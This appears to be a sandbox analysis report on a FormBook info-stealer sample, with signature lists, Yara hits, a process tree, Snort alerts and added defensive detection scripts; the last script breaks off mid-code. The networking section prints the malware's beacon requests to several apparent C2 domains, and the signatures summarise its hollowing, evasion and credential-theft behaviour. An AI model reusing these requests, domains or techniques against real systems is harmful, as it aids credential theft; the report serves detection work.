Analysis Report mp0nMsMroT.exe

Overview

General Information

Sample Name:mp0nMsMroT.exe
Analysis ID:286180
MD5:26a5cbbf551c2a810792aad03ed4d51b
SHA1:b509a59df8bcbb441cb8f527c920a37e49521098
SHA256:af164cd974521a1577be7c68ed0babe78e59f94ae13f79777f8565cef148c09f

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Startup

  • System is w10x64
  • mp0nMsMroT.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\mp0nMsMroT.exe' MD5: 26A5CBBF551C2A810792AAD03ED4D51B)
    • mp0nMsMroT.exe (PID: 6732 cmdline: 'C:\Users\user\Desktop\mp0nMsMroT.exe' MD5: 26A5CBBF551C2A810792AAD03ED4D51B)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 4608 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 5556 cmdline: /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
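The tree above is the chain the injection signatures describe: the sample starts a second copy of itself (the suspended child that is hollowed), the FormBook payload then runs from explorer.exe and from NETSTAT.EXE (process 5 in this report; its memory region at 0x2D70000 is one of the FormBook Yara hits listed further down), and NETSTAT.EXE starts cmd.exe to delete the original file. No Sigma rule fired on this run, so the following is an added example of the process-creation logic a detection engineer might write for that chain. It is not part of the Joe Sandbox report. The events are constructed from the tree (PIDs and command lines are copied from it; the image paths of explorer.exe and cmd.exe are assumed because the report omits them), and the three rules and the self-spawn allow-list are assumptions for the illustration.

```python
"""Process-tree rules for the hollowing / self-deletion chain in the Startup section.

Added example; not part of the Joe Sandbox report. Events are constructed from
the report's process tree: PIDs and command lines are copied from it, the
image paths of explorer.exe and cmd.exe are assumed (the report omits them).
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full image path as an EDR / Sysmon event would log it
    cmdline: str   # command line as logged ("" where the report shows none)


SAMPLE = r"C:\Users\user\Desktop\mp0nMsMroT.exe"

# Constructed from the report's Startup tree. The sandbox draws explorer.exe
# beneath PID 6732 because the sample injected into it; on a real host
# explorer.exe is the pre-existing shell and would not have that parent.
EVENTS = [
    ProcEvent(6708, 0, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(6732, 6708, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(3384, 6732, r"C:\Windows\explorer.exe", ""),                          # path assumed
    ProcEvent(4608, 3384, r"C:\Windows\SysWOW64\NETSTAT.EXE", r"C:\Windows\SysWOW64\NETSTAT.EXE"),
    ProcEvent(5556, 4608, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{SAMPLE}'"),    # path assumed
    ProcEvent(5988, 5556, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Programs that routinely spawn copies of themselves: an example allow-list, tune per estate.
SELF_SPAWN_ALLOWED = {"chrome.exe", "msedge.exe", "firefox.exe", "svchost.exe"}

# `del <path>` with optional quoting, as in the report's cmd.exe command line.
DEL_RE = re.compile(r"""\bdel\b\s+['"]?([^'"]+?)['"]?\s*$""", re.IGNORECASE)


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def build_index(events):
    return {e.pid: e for e in events}


def ancestors(by_pid, pid):
    """Yield the parent chain of pid, nearest parent first (cycle-safe)."""
    seen = set()
    e = by_pid.get(pid)
    while e is not None and e.ppid in by_pid and e.ppid not in seen:
        seen.add(e.ppid)
        e = by_pid[e.ppid]
        yield e


def detect(events):
    """Return (rule, pid) findings for the three behaviours visible in the tree."""
    by_pid = build_index(events)
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        # 1. A binary launching a second copy of itself: the usual prelude to
        #    hollowing the (suspended) child, cf. "Sample uses process hollowing technique".
        if _base(parent.image) == _base(e.image) and _base(e.image) not in SELF_SPAWN_ALLOWED:
            findings.append(("self_spawn", e.pid))
        # 2. netstat.exe is a console tool that has no business starting a shell.
        if _base(parent.image) == "netstat.exe" and _base(e.image) == "cmd.exe":
            findings.append(("netstat_spawns_cmd", e.pid))
        # 3. cmd.exe deleting the image of one of its own ancestors: dropper self-deletion.
        m = DEL_RE.search(e.cmdline)
        if _base(e.image) == "cmd.exe" and m:
            target = m.group(1).strip().lower()
            if any(a.image.lower() == target for a in ancestors(by_pid, e.pid)):
                findings.append(("ancestor_self_delete", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:22s} pid={pid}")
```

Rule 3 is the one worth keeping even where the first two are noisy: a shell deleting a file that an ancestor in its own chain was executed from is rare outside installers, and the walk up the chain is what ties the `del` in PID 5556 back to the sample that started the chain four processes earlier.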

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x918a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9f02:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18f07:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19f7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15fe9:$sqlite3step: 68 34 1C 7B E1
  • 0x160fc:$sqlite3step: 68 34 1C 7B E1
  • 0x16018:$sqlite3text: 68 38 2A 90 C5
  • 0x1613d:$sqlite3text: 68 38 2A 90 C5
  • 0x1602b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16153:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x918a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9f02:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18f07:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19f7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 entries in total; the remainder are not expanded here)

      Unpacked PEs

Source | Rule | Description | Author | Strings
1.1.mp0nMsMroT.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.mp0nMsMroT.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x918a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9f02:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18f07:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19f7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.mp0nMsMroT.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15fe9:$sqlite3step: 68 34 1C 7B E1
  • 0x160fc:$sqlite3step: 68 34 1C 7B E1
  • 0x16018:$sqlite3text: 68 38 2A 90 C5
  • 0x1613d:$sqlite3text: 68 38 2A 90 C5
  • 0x1602b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16153:$sqlite3blob: 68 53 D8 7F 8C
1.2.mp0nMsMroT.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.mp0nMsMroT.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x838a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18107:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1917a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 entries in total; the remainder are not expanded here)
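The tables above give, for each rule string, its bytes and the offset at which it was found. What follows is an added example, not part of the report and not code from Joe Security, yara-signator or JPCERT/CC: it re-finds those strings in a memory image the way a Yara scan does, decodes the three JPCERT strings as the x86 `push imm32` instructions their first byte (0x68) makes them, and evaluates the JPCERT rule, whose condition is assumed here to be all three strings (the page reproduces the strings but not the condition). The dump itself is not on the page, so the image scanned is a constructed zero-filled buffer with the patterns planted at the offsets the report lists for 1.1.mp0nMsMroT.exe.400000.0.raw.unpack; read a real dump into `image` to use it on one.

```python
"""Re-find the Yara string hits from the report's tables in a memory image.

Added example; not from the report, Joe Security, yara-signator or JPCERT/CC.
Byte patterns and offsets are copied from the table for
1.1.mp0nMsMroT.exe.400000.0.raw.unpack; the scanned image is a constructed
buffer with those patterns planted at those offsets.
"""
import struct

# yara-signator Formbook_1 sequences, as listed in the report
SIGNATOR = {
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "$sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "$sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "$sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "$sequence_8": "3C 54 74 04 3C 74 75 F4",
    "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
# JPCERT/CC Formbook strings, as listed in the report
JPCERT = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}
# Offsets the report gives for the raw unpack of process 1, region 0x400000
REPORTED_HITS = {
    "$sequence_0": [0x83d8, 0x8772], "$sequence_1": [0x14085], "$sequence_2": [0x13b71],
    "$sequence_3": [0x14187], "$sequence_4": [0x142ff], "$sequence_5": [0x918a],
    "$sequence_6": [0x12dec], "$sequence_7": [0x9f02], "$sequence_8": [0x18f07],
    "$sequence_9": [0x19f7a],
    "$sqlite3step": [0x15fe9, 0x160fc], "$sqlite3text": [0x16018, 0x1613d],
    "$sqlite3blob": [0x1602b, 0x16153],
}


def patterns(table):
    return {name: bytes.fromhex(hexstr) for name, hexstr in table.items()}


def find_all(image, pat):
    """All offsets of pat in image, overlapping occurrences included."""
    hits, i = [], image.find(pat)
    while i != -1:
        hits.append(i)
        i = image.find(pat, i + 1)
    return hits


def scan(image, table):
    return {name: find_all(image, pat) for name, pat in patterns(table).items()}


def jpcert_rule_matches(image):
    """Condition assumed to be 'all of them' (the page lists the strings, not the condition)."""
    return all(scan(image, JPCERT).values())


def push_imm32(pat):
    """Decode a 5-byte x86 `push imm32` (opcode 0x68, little-endian immediate)."""
    if len(pat) != 5 or pat[0] != 0x68:
        raise ValueError("not a push imm32 encoding")
    return struct.unpack("<I", pat[1:])[0]


def build_image(size=0x1B000):
    """Constructed stand-in for the dump: the patterns planted at the reported offsets."""
    buf = bytearray(size)
    allpat = {**patterns(SIGNATOR), **patterns(JPCERT)}
    for name, offs in REPORTED_HITS.items():
        for off in offs:
            buf[off:off + len(allpat[name])] = allpat[name]
    return bytes(buf)


if __name__ == "__main__":
    image = build_image()
    for name, hits in scan(image, {**SIGNATOR, **JPCERT}).items():
        status = "as reported" if hits == REPORTED_HITS[name] else "DIFFERS"
        print(f"{name:13s} {[hex(h) for h in hits]} {status}")
    for name, pat in patterns(JPCERT).items():
        print(f"{name}: push 0x{push_imm32(pat):08X}")
```

Two things the tables show on their own: $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) contains `0F 31`, the RDTSC instruction, bracketed by an add and a subtract into a stack slot, which is the kind of timing delta the "Tries to detect virtualization through RDTSC time measurements" signature is based on; and every offset in the `.unpack` (section-mapped) table is exactly 0xE00 lower than in the `.raw.unpack` table (0x75d8 against 0x83d8 for $sequence_0), the raw-file versus virtual-address difference of the dumped PE, so hit offsets are only comparable within one view. The JPCERT string names say the three immediates stand for sqlite3 functions, which fits the "Tries to harvest and steal browser information" signature: browser credential stores are SQLite databases.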

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: mp0nMsMroT.exe | Virustotal: Detection: 47%
Source: mp0nMsMroT.exe | ReversingLabs: Detection: 79%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: mp0nMsMroT.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.mp0nMsMroT.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.mp0nMsMroT.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_00408454 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_00405098 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02D7F470 FindFirstFileW,FindNextFileW,FindClose,
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49726
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49732
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49738
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.98.99.30:80 -> 192.168.2.5:49744
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49750
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49752
Uses netstat to query active network connections and open ports
Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG HTTP/1.1 | Host: www.smileyefero.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG HTTP/1.1 | Host: www.cxyl968.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG HTTP/1.1 | Host: www.bestselfietools.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG HTTP/1.1 | Host: www.homecaredispatch.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG HTTP/1.1 | Host: www.netrworksoultions.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG HTTP/1.1 | Host: www.splishysplashie.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG HTTP/1.1 | Host: www.ugpounds.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG HTTP/1.1 | Host: www.kuralike.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG HTTP/1.1 | Host: www.cdershoushichang.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG HTTP/1.1 | Host: www.cakoi.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG HTTP/1.1 | Host: www.davabeauty.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG HTTP/1.1 | Host: www.icfc-lr.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 34.196.13.28
Source: Joe Sandbox View | IP Address: 64.98.145.30
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: Joe Sandbox View | ASN Name: TUCOWS-3CA
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
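Twelve GET requests with the same path (/0tog/), the same second parameter (uTrL=ArghXbG) and no User-Agent header go to twelve different hosts, and the POSTs that follow carry a 411-byte form body under a browser User-Agent to a subset of the same hosts. That is the shape of one client working through a list of candidate C2 domains, and the 403 responses Snort flagged above are simply hosts that refused the request. The following is an added example, not a Joe Sandbox signature and not code from the report, of the clustering logic a detection engineer might run over proxy logs to surface such a client. The requests are copied from the entries in this section (all twelve GETs and two of the nine POST bodies, verbatim); the report prints seven NUL bytes after each GET and eight after each POST body, which the example keeps as part of the payload and treats as a client fingerprint. The host threshold and the alphabet test are assumptions made for the illustration.

```python
"""Cluster the beacons listed under Networking by path, parameter and encoding.

Added example; not part of the Joe Sandbox report and not one of its
signatures. Requests are copied from the report's "HTTP traffic detected"
entries (all twelve GETs; two of the nine POST bodies, verbatim). The
thresholds and the alphabet test are assumptions made for this illustration.
"""
from collections import defaultdict

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"

# host -> request target, as shown in the report's GET entries (sent without a User-Agent)
GET_TARGETS = {
    "www.smileyefero.com": "/0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG",
    "www.cxyl968.com": "/0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG",
    "www.bestselfietools.com": "/0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG",
    "www.homecaredispatch.com": "/0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG",
    "www.netrworksoultions.com": "/0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG",
    "www.splishysplashie.com": "/0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG",
    "www.ugpounds.info": "/0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG",
    "www.kuralike.com": "/0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG",
    "www.cdershoushichang.com": "/0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG",
    "www.cakoi.xyz": "/0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG",
    "www.davabeauty.com": "/0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG",
    "www.icfc-lr.com": "/0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG",
}

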